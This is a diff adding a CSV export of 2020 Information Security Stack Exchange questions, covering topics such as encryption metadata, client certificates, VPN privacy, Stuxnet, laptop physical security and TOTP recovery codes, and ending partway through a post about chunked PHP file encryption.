diff --git "a/stack_exchange/IS/Information Security 2020.csv" "b/stack_exchange/IS/Information Security 2020.csv" new file mode 100644--- /dev/null +++ "b/stack_exchange/IS/Information Security 2020.csv" @@ -0,0 +1,65322 @@ +Id,PostTypeId,AcceptedAnswerId,ParentId,CreationDate,DeletionDate,Score,ViewCount,Body,OwnerUserId,OwnerDisplayName,LastEditorUserId,LastEditorDisplayName,LastEditDate,LastActivityDate,Title,Tags,AnswerCount,CommentCount,FavoriteCount,ClosedDate,CommunityOwnedDate,ContentLicense +223502,1,223509,,1/1/2020 6:21,,0,88,"

And if so, what protections are available against this kind of thing?

+",113770,,,,,1/1/2020 12:58,Can an ethernet device plugged into a switch block all the other ethernet devices?,,1,1,,,,CC BY-SA 4.0 +223508,1,223512,,1/1/2020 11:44,,2,119,"

Suppose I symmetrically encrypt a file with a passphrase using GNU Privacy Guard and send it to a friend. I use the latest version and all the defaults, so AES-128 encryption is used, with the salt and s2k_count used for the password derivation function automatically generated.

+ +

I then tell my friend the passphrase and ask them to open it.

+ +

Are the salt, S2K type, s2k_count, and so on included in the file somehow, so that my friend can decrypt the file knowing only the password?

+ +

I suspect the answer is affirmative but I have not been able to find it in the documentation.

+",223884,,223884,,1/1/2020 12:36,1/1/2020 13:31,Is all metadata necessary for decryption included in a symmetrically encrypted GNU Privacy Guard message?,,1,4,,,,CC BY-SA 4.0 +223513,1,223514,,1/1/2020 13:41,,1,116,"

Assume we have only access to the traffic between two module (Hardware, Software, ...) and These modules communicate with SSL (PSK). +Is it possible to assess AES encryption of this traffic? +some features like key length, AES cypher mode or any other important parameter

+",79940,,,,,1/1/2020 14:18,AES Traffic Security Assesment,,2,2,,,,CC BY-SA 4.0 +223516,1,223517,,1/1/2020 14:49,,0,212,"

Just listened to a bit of the Darknet Diaries podcast episode on NotPetya. It’s insane just the damage it was able to cause even if it was only able to infect one machine initially. Which got me wondering: how could a similar large-scale attack happened?

+ +

Then I thought about cell towers. Our phones blindly connect to them every day. In fact, attackers can set up rogue towers that trick phones into connecting to them instead in order to perform a MITM attack. They just have to broadcast a stronger signal. That’s crazy.

+ +

So I was wondering: aren’t cell towers basically routers? If so, if an attacker was able to take control of one, and if they had some sort of iOS/Android 0-day in how devices receive packets or whatever, could an attacker essentially spread such a wide-scale attack like NotPetya launched?

+",224269,,,,,1/1/2020 15:29,"Are cell towers basically routers? If so, could one be hacked to spread malware to all connected devices?",,1,0,,,,CC BY-SA 4.0 +223518,1,,,1/1/2020 15:24,,3,161,"

From what I can tell there were two main TMP files present on the infected USB stick. The smaller of the two would run first and hook various functions related to viewing files so as to hide the LNK and TMP files.

+ +

While this was happening would it not raise suspicions? Someone would view the USB stick, see the six files and then they would just disappear?

+",,user224270,98538,,1/2/2020 11:25,1/2/2020 11:25,How did Stuxnet prevent the user from seeing the malicious files on a USB stick?,,0,0,1,,,CC BY-SA 4.0 +223519,1,223520,,1/1/2020 16:36,,1,93,"

Certificate authentication on https has always been one of my huge knowledge gaps ,and was trying to fill it today.

+ +

I have made some progress on the client side certificate authentication but however there's some fundamental question that can't get my head around.

+ +

I have worked with third parties that use to send the certificate (and passphrase) over and then we were able to start using their services. Unfortunately I wasn't involved at all in the process so not even sure if it's my misunderstanding. Assuming that was correct, please let me know if not, my questions are

+ +
    +
  • Do you exchange the pfx, with the private key as well as the certificate?
  • +
  • If I had a certificate signed by a trusted CA why not just send that one and the server would just need to validate it? is the case that the exchanges certificates are ad-hoc ones and they just need to validate it's issued by them?
  • +
  • Is this exchange where the Certificate Signing Request can be used?
  • +
+ +

I understand the question is both simple and vague but can't really see the use case of this exchange, from what I have been reading for a while

+ +

Thanks

+",224271,,,,,1/1/2020 16:50,"In client side certificate authentication why, if, do we need to share the certificate",,1,0,,,,CC BY-SA 4.0 +223521,1,223525,,1/1/2020 16:52,,0,414,"

I use the free version of proton VPN because it has such a nice interface. From my understanding, when I connect to one of their VPNs located in the US, my information passes through an encrypted tunnel visible to my ISP, then to an entry node, then to a relay node, then to an exit node, then to where my internet activities are told to go.

+ +

Let's say I was a cautious internet ""criminal"", and my ISP believed me to be such. They've hired one of you to come out to their location and make some guesses about what i was using their service for and you are really good at your job.

+ +

What would you be able to tell my ISP?

+ +

Tough question so thanks in advance!

+",120861,,,,,1/1/2020 20:18,What can my ISP see regarding my VPN tunnel?,,1,3,,1/10/2020 16:55,,CC BY-SA 4.0 +223523,1,,,1/1/2020 19:33,,1,98,"

For example, my website has Email/Password login and the ""sign in with Google"" button. If a user creates an account with their email and a password, then decides to sign in using the ""sign in with Google"" button, but using the same email as their email/password account, should we let them into their account? Or should the sign in attempt be blocked and the user redirected to the email/password login form?

+ +

Email/Password Account Email: example@gmail.com +Google Account Login Attempt: example@gmail.com

+ +

Thanks!

+",224278,,,,,1/1/2020 20:51,What is a login flow method to prevent account jacking when your website has Email/Password sign in AND Google Sign in?,,1,0,,,,CC BY-SA 4.0 +223526,1,223528,,1/1/2020 20:32,,1,172,"

I'm planning to start a distributed crawler in order to avoid common limitations imposed by servers/CDN like rate limit, region filter, and others.

+ +

My idea is to have a central server and multiple agents that will run on different networks. These agents will be SOCKS5 servers. The central server will round-robin the requests in the pool of agents (SOCKS5 servers) to access the origin (website).

+ +
    +
  • Is the origin able to detect the server IP?
  • +
  • I don't have control over the agent (SOCKS5 server), how safe is this connection? The owner of the SOCKS5 server is able to see what I'm doing or even change the request like a MiTM attack?
  • +
  • Something like this already exists?
  • +
+",224279,,6253,,1/1/2020 21:30,1/1/2020 21:30,Questions about SOCKS5 security,,1,2,,,,CC BY-SA 4.0 +223530,1,,,1/1/2020 21:57,,2,263,"

I’ve been thinking about P2P systems using asymmetric keys and wondering if there is anyway to recover an identity in the event it was compromised using some kind of web-of-trust.

+ +

This seems to be a large issue compared to a regular system (using a central authority) that can remove the intruder's access and restore control of the account to the real owner (Digicert, facebook, twitter, etc...).

+ +

Possible Peer-run Certificate Authority Design

+ +

What if a master key pair was generated by a user and then used to create a subkey. Then using 16+ random bytes the master keys private component could be encrypted. The public and encrypted private key parts can be stored on the network publicly. The public part of this master key would be the root identity for that user.

+ +

The owner could choose 5+ nodes on the network (friends?) to store parts of the passphrase used to encrypt the master key private component and then erase it's knowledge of those bytes.

+ +

The subkey would be the active user identity (with it's own AES password protecting the private part). Should this client get phished, forget their password, or someone steal their sub-key private component, we could use the peers to restore the master key and revoke this subkey. Then we could generate and sign a new subkey.

+ +

I'm not sure how this would work other than the client sending a request to each node and them verifying the client though some out-of-bands way (phone call? Text?) before sending their part of the master key password.

+ +

Would this work? Are their any existing solutions to this problem?

+",3927,,3927,,1/6/2020 20:36,1/26/2022 4:03,Possible public/private identity recovery after compromise without a centeral authority?,,1,2,2,,,CC BY-SA 4.0 +223533,1,,,1/2/2020 1:14,,1,114,"

I wrote an implementation of a non-interactive zero-knowledge proof system as outline in this research paper. As far as I can tell, it functions flawlessly as intended with text secrets such as authentication passwords.

+ +
# USER REGISTRATION:
+  # CLIENT-SIDE
+    client_zk = ZKProof.new(bits=256, curve_name=""secp256k1"")
+    signature = client_zk.create_signature(""Passw0rd"")
+    # send zk.params and signature to server for persistent storage
+
+
+# USER AUTHENTICATION:
+  # SERVER-SIDE
+    server_zk = ZKProof(client_zk.params)
+    token = ZKProof.random_token(bits=256)
+    # send token to client
+
+  # CLIENT-SIDE
+    challenge = client_zk.create_challenge(""Passw0rd"", token)
+    # send challenge to server
+
+  # SERVER-SIDE
+    if server_zk.prove_challenge(challenge, signature, token):
+      # user is authenticated...
+
+ +

While this use case is great for something like user databases, it does nothing for data protection. I am designing an application which will store encrypted text on the server. If I use a symmetric encryption algorithm, I can create proofs to ensure that the user is in possession of a particular password (assuming it was honestly registered when the key was created), however I have no way of VERIFYING that the encrypted data received by the server was indeed encrypted using that password since the server does not have access to the plain text OR encryption key. How can I best approach this?

+ +

Note: I CAN actually verify that a password (or key) was used to generate a zero-knowledge PROOF, but not the actual integrity of the data itself.

+",44529,,,,,1/2/2020 5:53,Verify Encryption Key with Non-Interactive Zero-Knowledge Proof,,0,4,,,,CC BY-SA 4.0 +223534,1,,,1/2/2020 1:16,,3,86,"

This is a duplicate of a stack overflow question, since it might apply more to security and authentication best practices.

+ +

I'm working on auth between a Chrome Extension, Google Cloud Platform, and trying to send the id_token JWT to an AWS server to retrieve user data (and/or establish a session?).

+ +

My question is this -- how can I prevent chrome extensions with tabs permissions from reading the GET request or the redirected URI which has the fully-validated user JWT?

+ +

The JWT confirms that a user is who they are, but how do I know my Chrome Extension is the one making the request to my backend?

+ +

I have a few ideas:

+ +
    +
  1. Maybe I can make a private window that only my extension can control

  2. +
  3. Maybe I can somehow use the nonce or get the nonce from my server first

  4. +
  5. Maybe my chrome extension has a private key or some way to verify itself with my backend, which has the public key

  6. +
+ +

Any help would be appreciated, it's difficult to research this specific scenario.

+ +
+ +
var url = 'https://accounts.google.com/o/oauth2/v2/auth' +
+          '?client_id=' + encodeURIComponent(chrome.runtime.getManifest().oauth2.client_id) +
+          '&response_type=id_token' +
+          '&redirect_uri=' + encodeURIComponent(chrome.identity.getRedirectURL()) +
+          '&scope=' + encodeURIComponent(chrome.runtime.getManifest().oauth2.scopes.join(' ')) +
+          '&nonce=' + Math.floor(Math.random() * 10000000);
+
+chrome.windows.create({ url: 'about:blank' }, function ({ tabs }) {
+    chrome.tabs.onUpdated.addListener(
+        function googleAuthorizationHook(tabId, changeInfo, tab) {
+            if (tab.id === tabs[0].id) {
+                if (tab.title !== 'about:blank') {
+                    console.log(url);
+                    if (tab.title.startsWith(chrome.identity.getRedirectURL())) {
+                        const id_token = tab.title.split('#')[1];
+                        console.log(id_token);
+                    } else {
+                        console.error(tab.title)
+                    }
+
+                    chrome.tabs.onUpdated.removeListener(googleAuthorizationHook);
+                    chrome.tabs.remove(tab.id);
+                }
+            }
+        }
+    );
+
+    chrome.tabs.update(tabs[0].id, { 'url': url });
+});
+
+",90061,,,,,1/2/2020 1:16,Can Chrome Extensions steal OAuth tokens from redirect-uri?,,0,1,,1/10/2020 16:55,,CC BY-SA 4.0 +223535,1,223593,,1/2/2020 2:53,,1,405,"

What is the difference between a digital certificate and a digital signature?

+ +

Read on the internet that the digital signature is the result of encrypting with a private key, the 'hash' of the message to be sent. As for the digital certificate it is not very clear to me.

+",224059,,6253,,1/2/2020 22:01,1/2/2020 22:08,Difference between certificate and digital signature,,3,0,1,1/2/2020 22:03,,CC BY-SA 4.0 +223544,1,223547,,1/2/2020 9:27,,1,381,"

In TOTP implementations, it's always suggested that you give your users recovery codes. Should I treat these like tokens? Display them once and hash them?

+ +

If so, I'd love to know why. If not, I'm curious too.

+",224297,,6253,,1/2/2020 9:39,1/2/2020 11:00,How should I store TOTP recovery codes on the server end?,,1,5,,,,CC BY-SA 4.0 +223553,1,223569,,1/2/2020 11:44,,0,134,"

Hopefully this question won't come across too closely to a which product is best as that is not my intention.

+ +

I am moving into a larger property and I would like to setup some home security now i'm not 100% sure on I should be aware of and how to possibly mitigate being broken into. +I also do not know the area much at all, it appears to be a quiet English town.

+ +

My main concerns are physical security and security of my home network.

+ +

Thoughts on physical was to either just get an alarm or some kind of IP camera setup covering the front and rear of the property but after hearing some rather alarming news Nest camera hacks I do however have a few raspberry pi's that could be setup as PI ip camera. But I'm not sure if that would make it more or less secure. One consideration is the property has a shed which will probably contain some bikes and tools which I would like to secure which makes me lead toward camera's +is having a set of camera's considered more secure? and if so, to what extent against what threat.

+ +

For home network security, I'm far more concerned the area generally has fairly tech savvy people due to lots of technical companies in the area. I've not moved in yet but I will probably just use whatever is supplied by the CSP with the nicest looking package. I'll then change the SSID and any passwords that came by default.

+ +

While I'm fairly technical I do not know that much about security and what I do know I can't seem to apply to this, as in how do I take what I think might be an issue and break it up into threats and actions so on. threat analysis I guess it would be called?

+ +

So after all that,

+ +
    +
  • What threats should I be wary of concerning physical security of a home?
  • +
  • What threats are there to my home network?
  • +
  • What actions can I take to mitigate some of the threats
  • +
+",211839,,,,,1/2/2020 15:56,Household attack vectors and mitigations,,1,0,,1/20/2020 6:38,,CC BY-SA 4.0 +223554,1,,,1/2/2020 13:07,,2,1502,"

There is this Web App which uses cloudflare and to bypass certain things I had to find a way to access the actual web server directly. I tried numerous things and finally I think I have found the actual server's IP but seems like direct access to IP is blocked as am greeted with this error.

+ +
Error 1003 Ray ID:
+Direct IP access not allowed
+
+ +

What header (or referer's value? ) to supply with our original request so that the web server accepts my request as a request routed via cloudflare's reverse proxy?

+ +

In other words, I want the actual server to believe am coming via cloudflare. I believe to do that we have to supply specific header or a specific referer's value but I can't figure out what to supply in actual request. Any help would he appreciated.

+ +

Thanks.

+",224309,,,,,1/2/2020 13:42,Is there any way to pretend like we are routing our request via cloudflare?,
,1,2,,1/21/2020 5:21,,CC BY-SA 4.0 +223556,1,223559,,1/2/2020 13:48,,0,720,"

My company has a 'bring your own device' policy. You connect your device to the WiFi, and then open a citrix environment through a web portal. Basically, everything inside the citrix env is company-software/email. Outside is your own software/mail/browser.

+ +

I know that anything I do online outside of the citrix environment still transfers over company WiFi with the possibility that it is inspected.

+ +

Very recently however, the connection to the internet outside the citrix environment ceased to work, I assume by design, since now I get a pop-up asking me to install a certificate that is clearly issued by the company. This should restore internet connection.

+ +

My questions:

+ +

Will this give them any additional ways to monitor my machine over the old situation?

+ +

Will they for example be able to inspect end-to-end encrypted messages?

+ +

Is it a good idea to accept this kind of a certificate given the fact that I am a contractor and work for multiple clients?

+ +

Additional point to consider: +Some of our developments require work/testing outside of this citrix environment, due to shortcomings of the VM. Still, there is no need or possibility to connect to any company resource (network shares etc...) from outside the VM.

+ +

EDIT +My question is specifically what kind of (additional) negative consequences this certificate will/might have, versus before, when we could access internet without any certificate installed. Therefor I think this question is different from Can my employer see what I do on the internet when I am connected to the company network?

+ +

EDIT +Example: this happens when opening outlook. +

+",55793,,55793,,1/2/2020 14:54,1/2/2020 14:54,Forced to install certificate on my laptop when using company WiFi. Risk?,,1,11,,1/2/2020 15:14,,CC BY-SA 4.0 +223557,1,,,1/2/2020 14:25,,12,1880,"

I've been using BitWarden as my main password keeper, would like to ask if it's safe? I know that everything is not 100% safe but still want to know if they are worth it.

+ +

All my passwords are different beside some accounts password.

+ +

I know there is also keepass but can't really be annoyed to backup it each time because I also use a lot my mobile and BitWarden has a mobile application that is really helpful.

+",224315,,76718,,1/2/2020 14:30,2/22/2021 5:01,Is BitWarden trusted?,,1,1,1,,,CC BY-SA 4.0 +223558,1,,,1/2/2020 14:39,,0,79,"

I reported a flaw to the security team and they changed the UIDs from regular integers to hash kind of a thing. Like this, XXXX-XXXX-and-so-on

+ +

I still want to try and bypass things but I don't understand what kind of hashing is this? I have seen a lot of applications using this kind of hash for tokens, UIDs etc. Characters are separated by - (dash or a hyphen) in these kind of tokens.

+",224317,,,,,1/2/2020 14:44,Understanding patch for my report,,1,3,,,,CC BY-SA 4.0 +223564,1,,,1/2/2020 15:11,,1,163,"

What possible risks/attack vectors could be introduced be allowing my server application to make outbound calls to a 3rd party REST API? The 3rd party REST API is off premises and owned and operated by the 3rd party.

+ +

In order to clarify and limit scope let's just focus on attacks that result in impact on our business (so DoS and things like that would count). Let's also assume that it's properly protected via HTTPS. The users will be other businesses and the on-boarding would be controlled, so there's very little room for bad actors to inject themselves as legitimate system users.

+ +

The data from the 3rd party is not essential/used/trusted in our system. In fact our calling out is purely a notification of an event being sent in a fire-and-forget scenario.

+",111417,,129883,,1/2/2020 17:28,1/2/2020 17:28,Security Risk of outbound web calls,,1,4,,1/21/2020 5:31,,CC BY-SA 4.0 +223567,1,,,1/2/2020 15:25,,0,286,"

Recently, when staying in a rented apartment, I signed in to the YouTube app on the smart TV by entering a code using chrome on my tablet to pair them. I was planning to log out before I vacated the apartment but forgot to do so.

+ +

What are the security implementations of this? I am not bothered by people seeing my viewing history on YouTube etc., but obviously wouldn't like anyone to access any other google services via my account.

+",37242,,,,,1/21/2022 20:06,Didn't log out of YouTube - Is this a problem?,,1,2,1,,,CC BY-SA 4.0 +223572,1,,,1/2/2020 16:14,,2,782,"

There is a requirement for an unattended, publicly-accessible machine that I have to only allow company-approved USB devices (e.g., USB mass storage, keyboard, mouse, Bluetooth, etc.,) and block all the rest (non-approved).

+ +

Even though PID, VID, serial number are unique identifiers to USB devices, but, if somebody knows those information he/she can easily create a USB with the identifiers mentioned above and produce an approved USB.

+ +

Is there any way that I can add unique and secure identifiers to USBs (except VID, PID, S/N) and set up a mechanism to differentiate between company approved USBs and non-approved ones and allow only the approved ones?

+ +

Expected result: Secure USB for devices that are left unattended (e.g., kiosk) in public places.

+",224324,,6253,,1/2/2020 17:20,10/24/2021 1:05,Secure USB (unique identifier),,3,2,,,,CC BY-SA 4.0 +223573,1,,,1/2/2020 16:21,,0,159,"

I am about to go travelling to some high risk countries where corrupt officials will most likely try to go through my laptop and external HDD.

+ +

I am using Linux Mint and LUKS. Could someone please tell me based on these pictures whether I have encrypted them both properly, this includes the cache (or whatever it is called) as I would hate to leak information. I know that /boot can stay unencrypted.

+ +

Picture of my laptop's HDD: +

+ +

Picture of external HDD after I entered password: +

+ +

I can provide more information upon request.

+ +

Thank you

+",111952,,,,,1/3/2020 14:05,Have I used LUKS properly?,,1,4,,,,CC BY-SA 4.0 +223577,1,223585,,1/2/2020 17:29,,0,97,"

Searched around and couldn't find a similar question.

+ +

I've gotten tired of waiting for an 2FA SMS to come every time I check my email. So I got to setting up an app similar to say Google Authentication on my desktop, so that when I get prompted for a code I can just copy/paste from my toolbar.

+ +

I can see how this basically defeats the 2FA purpose though right?

+",79228,,6253,,1/2/2020 17:31,1/2/2020 18:49,Is there a security problem with having two factor auth running on the same machine that's requesting access?,,1,2,,,,CC BY-SA 4.0 +223578,1,,,1/2/2020 17:30,,0,94,"

A similar question has been asked here:

+ +

Can hackers detect my operating system?

+ +

My question is, if malicious file has been downloaded off of a secure 3rd party website (i.e. not owned/controlled by the malware writer), would this malware be able to detect which operating system it has been downloaded to? Or would the malware need to be tailored to one particular OS?

+",215324,,,,,1/2/2020 17:30,Can an already downloaded malicious file detect the operating system?,,0,3,,,,CC BY-SA 4.0 +223586,1,,,1/2/2020 18:57,,2,204,"

If you have multiple products/sites under a common domain, what are the advantages and disadvantages, from user convenience to security, of having a common login page? For example, this site uses https://security.stackexchange.com/users/login for login. Google uses accounts.google.com and Microsoft uses login.live.com. However Apple doesn't have a common page, Facebook has the login form on the home page and most banks do too.

+",168571,,,,,1/27/2022 10:56,What are the tradeoffs between a common login site and login-per-site?,,2,2,,,,CC BY-SA 4.0 +223587,1,223594,,1/2/2020 19:04,,1,2099,"

I noticed this while testing SNI-based HTTPS filtering for fun. My test was to block mail.yahoo.com, but allow other yahoo.com services. Here are my tests using Chrome:

+ +
    +
  1. Access mail.yahoo.com by entering the full URL https://mail.yahoo.com: BLOCKED

  2. +
  3. Access mail.yahoo.com by logging into my Yahoo account via https://yahoo.com, and clicking the ""Mail"" link: NOT BLOCKED

  4. +
+ +

I ran a packet capture while re-creating test #2 and I see there are no Client Hello messages with the mail.yahoo.com name in the SNI extension field. This is why I assume the web filter, which relies on inspecting the SNI extension field, is not blocking the website.

+ +

I am trying to understand why I wouldn't see a Client Hello message w/ mail.yahoo.com in the SNI field when running test #2. Is the browser somehow using the same TLS session since the *.yahoo.com certificate is valid for both www.yahoo.com and mail.yahoo.com? I am interested to know more about how this works.

+",224327,,224327,,1/3/2020 2:56,1/3/2020 2:56,No Client Hello w/ SNI when accessing website's subdomain via link,,1,6,,,,CC BY-SA 4.0 +223588,1,,,1/2/2020 19:25,,0,183,"

If the intention of attacker is to execute an arbitrary client side script in the context of a web application, is XSS the only possible attack other than compromising the server with an RCE or a sub-resource supply chain attack?

+ +
    +
  • XSS is Cross Site Scripting - Be it reflected, persistent or DOM based.
  • +
  • A sub-resource supply chain attack is where you compromise a sub resource such as CSS, javascript, flash objects etc by compromising the supply chain ie; compromising the CDNs, S3 buckets etc or by MITM a subresource loaded over non-https channel.
  • +
+",121141,,485,,1/10/2020 14:12,1/10/2020 14:12,Is there a vulnerability other than XSS which can result in client side script execution?,,1,0,,,,CC BY-SA 4.0 +223597,1,,,1/2/2020 22:27,,2,702,"

Why I believe this question is not a duplicate: +There are multiple questions dealing with the exploitation of a locked computer on this site, but most of the answers are focused on exploiting a non-hardened system in default configuration. I believe that in recent years, with major advances in encryption and hardware+software authentication (secure boot, bitlocker, virtualization, UEFI,...), the threat model for a hardened laptop is significantly different and therefore, I'm reasking this question under the following scenario:

+ +

Technical assumptions:

+ +
    +
  1. I'm using a modern Windows 10 Pro laptop, with the OS and all drivers updated to latest versions.
  2. +
  3. Laptop is locked, with following authentication methods: fingerprint reader, strong password, reasonably strong PIN (probably would not survive an offline brute-force).
  4. +
  5. Internal drive is encrypted with PIN-less Bitlocker, using TPM.
  6. +
  7. UEFI is password-protected, booting from external drive requires UEFI password, network boot is disabled, Secure Boot is on.
  8. +
  9. I'm connected to the same network as an attacker (attacker may potentially even own the network).
  10. +
  11. The laptop has an enabled Thunderbolt 3 port, but before any conected device is accepted, it must be authorized by the user (which should not be possible on the lock screen).
  12. +
  13. Laptop has a free M.2 slot inside, dis/re-assembly is possible in under a minute.
  14. +
+ +

Assuming I'm sitting somewhere with an attacker, I lock my laptop and leave for 5 minutes, is it feasible for the attacker to gain access to my laptop (either by bypassing the lock screen, or extracting files using some other method (extracting the bitlocker key,...)) before I return, under the condition that I mustn't notice anything suspicious after coming back?

+",224340,,224340,,1/3/2020 2:14,1/3/2020 2:14,What is the physical security (Evil Maid) threat model of a modern hardened laptop?,,2,5,,,,CC BY-SA 4.0 +223602,1,223605,,1/3/2020 0:14,,1,320,"

I'm learning about security, and it seems that all of the security problems I have seen come from input from malicious actors.

+ +

I was told that it's possible to check for the existence of bugs in a program, but not possible to check that a program doesn't have any bugs. Following from this, this means that it's not possible to prove that a program is 100% secure (correct me if I'm wrong).

+ +

So I was thinking, is it possible for a program to be hacked in some way without explicitly taking user input?

+ +

And by hack, I mean making the program do something it wasn't designed to do.

+ +

For example: somehow forcing a program to take in user input by other means even though the actual program code doesn't take in user input.

+ +

Or subverting the execution of a simple Hello World program and making it execute a shell.

+ +

Is it possible to craft a program that doesn't explicitly take user input, but can still be hacked?

+",199580,,6253,,1/3/2020 12:50,1/3/2020 12:50,Can a program that doesn't explicitly take user input be hacked?,,2,5,0,,,CC BY-SA 4.0 +223603,1,,,1/3/2020 0:26,,6,4416,"

What is the security risk of not disabling TLS v1.1/.2 ?

+ +

I have multiple websites on Cloudflare

+",162382,,,,,1/3/2020 2:56,main reasons to disable TLS 1.1/1.2,,2,2,1,,,CC BY-SA 4.0 +223608,1,,,1/3/2020 3:04,,2,220,"

So I booted up two windows 7 64bit sp1 versions in virtualbox and shared their network and the operating systems are vulnerable to the SMB exploit that the wannacry ransomware is using. The Issue is that when I'm running wireshark I don't see any attempts of the SMB exploit on the other machine. Is it because wannacry is detecting the vm?

+ +

I want to see SMB activity in my lab, which is my main goal of this test.

+ +

+",224102,,,,,1/3/2020 5:29,Wannacry testing in lab - Not getting SMB scan attempts,,1,2,,,,CC BY-SA 4.0 +223609,1,,,1/3/2020 4:12,,0,89,"

I'm running https://ngrok.com/ on Windows 10 pro with a custom app made on Node server running locally (can't be Linux) for a test suite that uses both web and desktop integrated. So I'm basically hosting a server on the machine for another internal machine to access via the internet (there is no other way to solve the problem). Not considering securing the app itself but in case someone discovers the IP of the machine what can I do to secure it? The machine cannot use VPN, it's not connected to a domain but just plugged into ethernet. Only minimum software is running and everything else was removed. Everything is up to date and Bitdefender is installed.

+",222398,,,,,9/29/2020 8:02,How to protect Server running on Windows 10 with Node Ngrok against attackers?,,1,0,,,,CC BY-SA 4.0 +223610,1,223611,,1/3/2020 4:43,,0,184,"

I'm working on improving the security of my own system by mitigating the chance sensitive information, (e.g. encryption keys) stored in RAM, are inadvertently written to disk. As of now I know of three common ways this can occur and how they could be mitigated:

+ +
    +
  1. The contents of RAM are copied to hiberfil.sys when Windows Hibernates + +
      +
    • Solution: Disable Windows Hibernation
    • +
  2. +
  3. Some contents of RAM are copied into the swap file. + +
      +
    • Solution: Encrypt the swap file.
    • +
  4. +
  5. Memory Dumps during Windows Blue-screens. + +
      +
    • Solution: Disable memory dump file generation
    • +
  6. +
+ +

Excluding these (as well as tools specifically designed to dump memory) are there any other reasons RAM could unintentionally be written to disk by the operating system?

+ +

I would really appreciate any help I could get!

+",224347,,,,,1/3/2020 5:06,In what ways can the contents of RAM be (inadvertently) written to disk?,,1,2,,,,CC BY-SA 4.0 +223614,1,,,1/3/2020 6:49,,1,122,"

I am looking for best practice for username/password login. +People have different views for client side hashing on password.

+ +

From Google's recommendation +https://cloud.google.com/solutions/modern-password-security-for-system-designers.pdf

+ +

The client side hashing should be implemented as below:

+ +
+

Have the client computer hash the password using a cryptographically + secure algorithm and a unique salt provided by the server. When the + password is received by the server, hash it again with a different + salt that is unknown to the client. Be sure to store both salts + securely.

+
+ +

My questions are

+ +
    +
  1. I agree the server should send a (unique) salt to the client. But why does the server need to hash the client result again with another salt?

  2. +
  3. Does the above mechanism suggest the server should store both salts as separate columns in the database table? And assume both salts are static (not changed per each login?)

  4. +
  5. SSL/TLS have mechanism to avoid replay attack. Does the above mechanism provide extra value to counter replay attack? I don't see any random factor about the static salts and I cannot relate anything can address replay attack.

  6. +
+",224345,,,,,1/3/2020 6:49,Why server side hashing is required if the client side hashing is already in place?,,0,6,,,,CC BY-SA 4.0 +223615,1,223617,,1/3/2020 7:07,,1,91,"

I’m willing to create a system of transferable documents (identified by it’s ID) whose author can transfer his ownership of that document to another person (identified by his/her ID).

+ +

For example:

+ +
    +
  1. Alice; owner of document 1.
  2. +
  3. Alice transfers his ownership of that document to Bob.
  4. +
  5. Now: Bob is owner of document 1.
  6. +
  7. Alice says she is the owner of document 1, but she fails.
  8. +
+ +

(Item 4 is very important)

+ +

We can make sure that the system with it’s author remains untouched by using digital signature. But if Alice made a copy of that document signed when she was the owner, there would be no way to prevent her from saying she is not the owner of the document.

+ +

So we would need something to make a signature to expire whenever it is transferred.

+ +

IF I HAD A DATABASE: I would simply add that signature to a ban list.

+ +

Are there any solutions to preserve the uniqueness of this document?

+",223270,,10863,,1/3/2020 8:23,1/3/2020 8:23,How can I preserve the uniqueness of a document without a database?,,1,0,,,,CC BY-SA 4.0 +223619,1,,,1/3/2020 9:35,,0,154,"

We're a company selling embedded devices. Our devices use u-boot & Linux, both being GPL and therefore we have to release the sourcecode as used to build our binary.

+ +

We're in the process of implementing more security measures (both to increase reliability as well as protection against IP theft), so of cause encryption becomes a topic. Some people call for the encryption of u-boot and kernel (which is supported by the hardware for the bootloader as well as by u-boot for the kernel).

+ +

Is there a reasoning in protecting our GPL covered binaries by encryption? We already have secure boot in place (HW for Bootloader, U-Boot for Kernel, ...)

+",224360,,224360,,1/3/2020 10:42,1/3/2020 10:42,Is there a reasoning encrypting a GPL binary where I have to publish the sourcecode?,,1,0,,,,CC BY-SA 4.0 +223621,1,,,1/3/2020 10:38,,1,333,"

We are currently evaluating which authorization type to use for our production AppSync APIs.

+ +

As per AWS docs(https://docs.aws.amazon.com/appsync/latest/devguide/security.html, https://aws.amazon.com/blogs/mobile/using-multiple-authorization-types-with-aws-appsync-graphql-apis/ ), AppSync supports multiple authorization types - like API Key based (passing a static API Key), IAM role based.

+ +

My questions are around the differences between API Key based approach & IAM based one:

+ +

1)why is using a static api-key considered bad for production use cases if all calls to AppSync are HTTPS based(which has good encryption)?

+ +

2)Why can't we use a short lived token of our own along with API key & validate that token in a resolver? This would bring in some dynamism as the token is shortlived , so even if somebody hacks and gets this token ; by them time a replay happens the token is already expired?

+ +

3)The previous manual token approach seems similar to using an IAM role for Authorization. How safer would it be to use Amazon Cognito's IAM Auth. roles for this be than a manual token approach? Does the SIGV4 standard used by AWS help in anyway here?

+",224363,,,,,1/3/2020 10:38,AWS Appsync authorization - why is IAM authorization safer than API Key based approach,,0,0,,,,CC BY-SA 4.0 +223629,1,,,1/3/2020 14:10,,1,73,"

UPDATE: Upon further research, I discovered a library that appears to meet my needs, especially with regard to the chunked aspect. Rather than ""roll my own"", I would be better served to use this well-established library:

+ +

https://github.com/defuse/php-encryption

+ +
+ +

I have a need to encrypt large files (up to 2GB), while at rest, using an amount of memory that is not a function of the input file size.

+ +

Accordingly, I intend to employ a ""chunked"" approach whereby I read n bytes of the input file, encrypt it, append it to a file pointer, and repeat until the end of the input file is reached. To decrypt, the process would be reversed, in essence.

+ +

I have found what looks to be a fairly reasonable attempt at this:

+ +

https://www.php.net/manual/en/function.openssl-encrypt.php#120141

+ +

But I have several questions/concerns about the author's code:

+ +
    +
  1. Why does the author hash the key and then take only the first 16 characters from the hash?
  2. +
+ + + +
$key = substr(sha1($key, true), 0, 16);
+
+ +

I thought that perhaps there is a limit to the key length, but passing a key whose lengh is much greater than 16 characters does not seem to cause an encryption/decryption failure, in which case this seems entirely pointless, if not detrimental to the viability of this function.

+ +

Doesn't this alteration weaken the key considerably by reducing it to a mere 16 characters in the [a-f0-9] range?

+ +
    +
  1. Why does the author Use the first 16 bytes of the ciphertext as the next initialization vector inside the while loop?
  2. +
+ + + +
$iv = substr($ciphertext, 0, 16);
+
+ +

From what I gather, this is strictly necessary for the chunked approach to work because the IV for each chunk must be known while decrypting, and in this implementation, it is obtained from the previous chunk.

+ +

My understanding is that where CBC ciphers are concerned, the best-practice is for every call to openssl_encrypt() to use a maximally random IV. To that end, would it be better to call openssl_random_pseudo_bytes(16) within each iteration, as the author does initially (outside the loop), and prepend the freshly-generated IV to the chunk? If so, it seems like that would affect the block size/handling such that I would need to make other changes.

+ +

In any case, is the author's approach to generating the IV for each chunk sane? Or should I rework this aspect?

+ +
    +
